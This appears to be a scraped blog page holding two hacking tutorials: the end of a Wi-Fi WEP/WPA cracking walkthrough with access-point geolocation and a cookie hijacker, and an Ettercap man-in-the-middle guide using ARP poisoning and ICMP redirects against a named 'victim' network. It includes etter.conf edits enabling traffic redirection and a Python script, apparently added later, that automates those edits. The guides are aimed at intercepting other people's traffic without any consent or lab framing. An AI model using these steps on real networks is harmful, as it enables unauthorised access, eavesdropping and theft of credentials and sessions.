<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oy6wZYU1f-8/UE4A16MFI-I/AAAAAAAAANA/W-hRH3edm04/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://4.bp.blogspot.com/-oy6wZYU1f-8/UE4A16MFI-I/AAAAAAAAANA/W-hRH3edm04/s640/3.jpg" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="color: red; font-size: large;">Now if you see closely, you'll note that the two buttons below the scan button will get enabled, the first button is the WEP cracking button and the second one is for WPA cracking.</span><br />
<span style="color: red; font-size: large;"><br /></span>
<span style="color: red; font-size: large;">click the button for WEP cracking </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-OOHi1mXrkaI/UE4A3Iq2gEI/AAAAAAAAANI/xKMil7ENHSQ/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://1.bp.blogspot.com/-OOHi1mXrkaI/UE4A3Iq2gEI/AAAAAAAAANI/xKMil7ENHSQ/s640/4.jpg" width="640" /></span></a></div>
<br />
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">after clicking that button, a new dialog box will open. you can select the WEP network from the list and then select the type of attack, i.e. ARP replay attack, chop-chop attack or fragmentation attack. then click "Attack"...</span></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<span style="color: red; font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-mcElxObphu4/UE4A4IazeUI/AAAAAAAAANQ/qcia2qqhKPw/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://4.bp.blogspot.com/-mcElxObphu4/UE4A4IazeUI/AAAAAAAAANQ/qcia2qqhKPw/s640/5.jpg" width="640" /></span></a></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">you'll be able to see the number of IVs increasing. there's a progress bar at the bottom of the dialog box; when the progress bar reaches the end, the tool starts aircrack to crack the wifi password.</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-703V8cJPTbw/UE4A5AbY2JI/AAAAAAAAANU/iOw4eSrpZo8/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="478" src="http://4.bp.blogspot.com/-703V8cJPTbw/UE4A5AbY2JI/AAAAAAAAANU/iOw4eSrpZo8/s640/6.jpg" width="640" /></span></a></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">when the password is cracked, it will be shown at the bottom of the dialog box...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">NOW COMES THE INTERESTING PART: </span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">(before going further, i suggest you to connect to the internet for this)</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">go to "toolbox" --> Geolocatory tracker.</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-57LbFwMOilc/UE4A5mID9-I/AAAAAAAAANg/KEnJu9LTAXk/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="358" src="http://1.bp.blogspot.com/-57LbFwMOilc/UE4A5mID9-I/AAAAAAAAANg/KEnJu9LTAXk/s640/7.jpg" width="640" /></span></a></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">give the bssid of the AP in the text box and click "Trace".</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-_FKt_XdIdBA/UE4A68u5Y0I/AAAAAAAAANo/Q77RVwwpx28/s1600/8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="358" src="http://2.bp.blogspot.com/-_FKt_XdIdBA/UE4A68u5Y0I/AAAAAAAAANo/Q77RVwwpx28/s640/8.jpg" width="640" /></span></a></div>
<br />
<span style="color: red; font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="color: red; font-size: large;">i think everyone has already guessed what it will show...</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">YES... INDEED... IT WILL SHOW YOU THE LOCATION OF THE AP ON THE GOOGLE MAPS ... you can see the coordinates as well..</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-jFhC-ThmnZ8/UE4A8Yhpc9I/AAAAAAAAANw/ZQwTTYdmZLo/s1600/9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: red; font-size: large;"><img border="0" height="358" src="http://3.bp.blogspot.com/-jFhC-ThmnZ8/UE4A8Yhpc9I/AAAAAAAAANw/ZQwTTYdmZLo/s640/9.jpg" width="640" /></span></a></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">and also you can see in the toolbox, there's a button for cookie hijacking called "cookie hijacker" ..</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">ok guys so that's it for now... :-)</span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">PM me if you need any help in this :)</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: red; font-size: large;">Posted by Abyss Zircanavo (http://www.blogger.com/profile/17618036098642560367), 0 comments.</span></div>
<div style="text-align: center;">
<span style="font-size: x-large;"><b>WIRELESS MITM ATTACK (INTERCEPTING THE DATA)</b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>Published 2012-06-29, last updated 2013-09-23.</i></span></div>
<br />
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>In this tutorial I'll show how you can intercept the data while the victim is communicating...</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>ok, but before we get started there are certain requirements which are necessary:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>1) Backtrack 5 R2 (I am using R2; if you have R1 then no problem) :-)</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>2) Connection with the victim's Wireless Network </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>TOOLS WHICH ARE USED IN THE PROCESS:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>1) Ettercap</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>2) Burpsuite </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>For those who haven't cracked the victim's wireless password yet, I suggest you first read the cracking tutorial and then this one.</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>I can suggest some good tools for wireless cracking:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>1) Aircrack Tool</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>2) Gerix-wifi-Cracker Tool</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>3) Airoscript</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>ALL THREE SHIP WITH BACKTRACK 5 R2</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>SO LETS GET STARTED !!</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i>STEP 1</i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>We have to edit Ettercap's configuration file before starting it. Why? Because the iptables redirect commands Ettercap uses to hook intercepted traffic (it runs them to redirect a port on the poisoned interface to a local listener) are commented out by default, so nothing gets redirected no matter which interface you sniff on.</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>So, to edit the file, open a terminal and type:</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<i><span class="Apple-tab-span" style="background-color: white; color: red; white-space: pre;"> </span><span style="background-color: white; color: purple; font-size: large;"><b>vim /etc/etter.conf </b></span></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>now keep scrolling down until you find this block (the trailing $ is vim marking lines cut off at the right edge of the terminal; the real lines continue past it):</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#---------------</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># Linux</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#---------------</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># if you use ipchains:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rp$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %r$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># if you use iptables:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRE$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIR$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>change it to the following (remove the leading # from the two iptables lines only; the ipchains lines stay commented):</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#---------------</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># Linux</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#---------------</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># if you use ipchains:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rp$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %r$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i># if you use iptables:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRE$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIR$</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-q6k_uI5jhY4/T-yT5gaeA1I/AAAAAAAAAJw/E8XohfmclpM/s1600/conf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: red;"><i><img border="0" height="356" src="http://4.bp.blogspot.com/-q6k_uI5jhY4/T-yT5gaeA1I/AAAAAAAAAJw/E8XohfmclpM/s640/conf.png" width="640" /></i></span></a></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>Save and close it. One more thing in the same file: right after start-up Ettercap drops its privileges to ec_uid/ec_gid (65534, i.e. nobody, by default), and an unprivileged process cannot run iptables, so the redirect commands fail silently unless you also set ec_uid = 0 and ec_gid = 0 in the [privs] section at the top of the file.</i></span></div>
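<div style="text-align: left;">
<span style="background-color: white; color: red;"><i>An added check, written for this edit and not part of the original post: a small Python script that parses an etter.conf-style file and reports whether the iptables redirect commands are active and whether ec_uid/ec_gid are 0, then applies exactly the edit described above and re-checks. The configuration fragment inside it is constructed to mirror the layout of the stock file (it is not copied from the screenshot), and the checker looks only at the [privs] and redir_command keys.</i></span></div>

```python
import re

# Constructed fragment mirroring the layout of the stock etter.conf (made up for this example,
# not copied from the screenshot above): privileges at the top, redirect commands further down.
DEFAULT_CONF = """\
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534                # nobody is the default

[strings]
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
"""


def parse_etter_conf(text):
    """Return {key: value} for the active assignments only.

    Lines starting with '#' are comments, so a commented-out
    redir_command_on simply does not appear in the result.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments, full-line or trailing
        if not line or line.startswith("["):     # blank line or [section] header
            continue
        m = re.match(r"^(\w+)\s*=\s*(.*)$", line)
        if m:
            settings[m.group(1)] = m.group(2).strip().strip('"')
    return settings


def redirect_problems(text):
    """List everything that would stop Ettercap's port redirection from working."""
    s = parse_etter_conf(text)
    problems = []
    for key in ("redir_command_on", "redir_command_off"):
        if key not in s:
            problems.append(f"{key} is not set (still commented out)")
        elif not s[key].startswith("iptables "):
            problems.append(f"{key} does not use iptables: {s[key]}")
    for key in ("ec_uid", "ec_gid"):
        if s.get(key) != "0":
            problems.append(f"{key} = {s.get(key)!r}: ettercap drops to this id and cannot run iptables")
    return problems


def apply_fix(text):
    """Uncomment the two iptables redirect lines and set ec_uid/ec_gid to 0, leaving the rest untouched."""
    out = []
    for line in text.splitlines():
        stripped = line.lstrip()
        if stripped.startswith("#redir_command_") and "iptables" in stripped:
            line = stripped[1:]                       # remove the leading '#'
        elif re.match(r"^(ec_uid|ec_gid)\s*=", stripped):
            line = stripped.split("=", 1)[0].strip() + " = 0"
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("before:", redirect_problems(DEFAULT_CONF))
    print("after: ", redirect_problems(apply_fix(DEFAULT_CONF)))
```

<div style="text-align: left;">
<span style="background-color: white; color: red;"><i>To check your real file rather than the built-in sample, call redirect_problems(open("/etc/etter.conf").read()); an empty list means both redirect commands are active and Ettercap keeps root for them.</i></span></div>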
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i>STEP 2</i></b></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>(If you guys already know how to do a normal MITM then skip this step)</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>Start Ettercap (the GTK interface: ettercap -G)</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-JxVa4Y3HaX8/T-yU6R-9BwI/AAAAAAAAAJ4/y96uDjWNuGc/s1600/1.png" imageanchor="1"><span style="background-color: white; color: red;"><i><img border="0" height="358" src="http://3.bp.blogspot.com/-JxVa4Y3HaX8/T-yU6R-9BwI/AAAAAAAAAJ4/y96uDjWNuGc/s640/1.png" width="640" /></i></span></a></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>go to SNIFF --> UNIFIED SNIFFING</i></span></div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://1.bp.blogspot.com/-nSAT8psp75U/T-ybliMrkdI/AAAAAAAAALI/gFLuj5G0sYc/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://1.bp.blogspot.com/-nSAT8psp75U/T-ybliMrkdI/AAAAAAAAALI/gFLuj5G0sYc/s640/2.png" width="640" /></i></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>select N/W Interface ---> wlan0 --> OK</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-U1xdrFAaqVg/T-ydGQuKtKI/AAAAAAAAALY/nP7Y9D_3FRg/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="background-color: white; color: red;"><i><img border="0" height="358" src="http://2.bp.blogspot.com/-U1xdrFAaqVg/T-ydGQuKtKI/AAAAAAAAALY/nP7Y9D_3FRg/s640/4.png" width="640" /></i></span></a></div>
<br />
<div style="text-align: center;">
</div>
<br />
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>(wlan0 is my wireless interface. check yours and then add.)</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>HOSTS --> SCAN FOR HOSTS</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-WntXtdQcvlM/T-ydvbdUunI/AAAAAAAAALg/ikqp7cFNyqE/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://4.bp.blogspot.com/-WntXtdQcvlM/T-ydvbdUunI/AAAAAAAAALg/ikqp7cFNyqE/s640/5.png" width="640" /></i></a></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>HOSTS --> HOSTS LIST </i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-CMuA4RA_4uk/T-yefXLqJeI/AAAAAAAAALo/FktpdNxjM3k/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://4.bp.blogspot.com/-CMuA4RA_4uk/T-yefXLqJeI/AAAAAAAAALo/FktpdNxjM3k/s640/6.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i> Select the victim's IP and click "ADD TO TARGET 1", then select the gateway's IP and click "ADD TO TARGET 2". (If Target 2 is left empty, Ettercap poisons every host on the subnet, which is far noisier and can take the whole LAN offline.)
</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://1.bp.blogspot.com/-8wmR7aMZ5qQ/T-yfRZjprTI/AAAAAAAAALw/ntM-vVGnBrE/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://1.bp.blogspot.com/-8wmR7aMZ5qQ/T-yfRZjprTI/AAAAAAAAALw/ntM-vVGnBrE/s640/7.png" width="640" /></i></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i> </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>MITM --> ARP POISONING ---> (tick on it) SNIFF REMOTE CONNECTION --> OK</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-blDpgKaYbOM/T-yf-se01BI/AAAAAAAAAL4/xsRCqGXSetk/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://4.bp.blogspot.com/-blDpgKaYbOM/T-yf-se01BI/AAAAAAAAAL4/xsRCqGXSetk/s640/8.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://3.bp.blogspot.com/-dMR9mFM4seU/T-ygzjGcyYI/AAAAAAAAAMA/vpGzJlU075c/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-dMR9mFM4seU/T-ygzjGcyYI/AAAAAAAAAMA/vpGzJlU075c/s640/9.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>MITM --> ICMP REDIRECT --> enter the real gateway's MAC ADDRESS and IP ADDRESS under GATEWAY INFORMATION --> OK. Ettercap forges ICMP redirect messages that appear to come from that gateway and tell the victim to route through you, so these fields must hold the gateway's addresses, not your own. This is a second, independent way of hijacking the victim's route; the ARP poisoning above is already enough on its own, and hosts hardened to ignore ICMP redirects will not react to this one.</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://2.bp.blogspot.com/-D5wZGYJLQV4/T-yVfRRWmPI/AAAAAAAAAKA/XVHjctXUHac/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://2.bp.blogspot.com/-D5wZGYJLQV4/T-yVfRRWmPI/AAAAAAAAAKA/XVHjctXUHac/s640/10.png" width="640" /></i></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://1.bp.blogspot.com/-5Yj-IWYZ4xY/T-yWNeVSkKI/AAAAAAAAAKI/jIFfA9RIvdk/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-5Yj-IWYZ4xY/T-yWNeVSkKI/AAAAAAAAAKI/jIFfA9RIvdk/s640/11.png" width="640" /></a></i></span></div>
